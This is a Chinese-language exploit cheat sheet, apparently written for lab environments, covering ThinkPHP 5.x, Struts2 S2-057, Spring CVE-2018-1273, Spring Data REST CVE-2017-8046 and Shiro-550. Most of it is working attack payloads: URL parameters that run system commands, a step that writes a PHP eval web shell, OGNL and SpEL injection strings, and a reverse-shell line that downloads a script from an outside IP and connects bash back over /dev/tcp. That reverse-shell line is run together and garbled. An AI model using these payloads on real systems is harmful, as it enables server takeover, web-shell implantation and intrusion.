Thinkphp5x远程命令执行及getshell
远程命令执行
打开环境,拼接以下目录,执行系统命令
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
远程代码执行
打开环境,拼接以下目录,执行代码命令
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
getshell
打开环境,拼接以下目录,植入木马,获取 shell
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]); ?> " >>121.php
struts2
S2-057远程执行代码漏洞
1.打开环境,访问漏洞地址
/struts2-showcase
2.在 URL 处拼接以下代码,访问后发现中间数字相加,证明中间可执行代码
${(123+123)}/actionChain1.action
3.将以下代码替换,获取 whoami
/struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
Spring
spring 代码执行(CVE-2018-1273)
1.打开环境,访问漏洞网址,注册抓包
/users
2.添加以下 poc ,显示 500 即输入成功
username[#this.getClass().forName("java.lang.Runtime" ).getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=
3.反弹 shell ,先写入 shell.sh ,开启监听,执行 shell.sh ,即可反弹到 shell
/usr/bin/wget -O /tmp/shel.sh http://112.126.80.8:8080/shell.shbash -i >& /dev/tcp/112.126.80.8/7777 0>&1/bin/bash /tmp/shell.sh
Spring Data Rest 远程命令执行命令(CVE-2017-8046)
1.打开环境,拼接以下目录进入漏洞处
/customers/1 2.抓包,将请求头替换为 PATCH,在数据包末尾空一行输入以下代码
PATCH /customers/1 HTTP/1.1
Host: ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 193[{"op":"replace","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname","value":"vulhub"}]
Shiro
Shiro rememberMe反序列化漏洞(Shiro-550) CVE-2016-4437
1.打开环境,抓包发送重放器,发送,若在 Cookie 中有 rememberMe=deleteMe 则存在漏洞
2.使用工具 shiro反序列化漏洞综合利用 v2.2 输入目标地址,检测秘钥-->爆破秘钥-->检测当前利用链,若存在利用链,则进入命令执行或内存马区块,反之爆破利用链
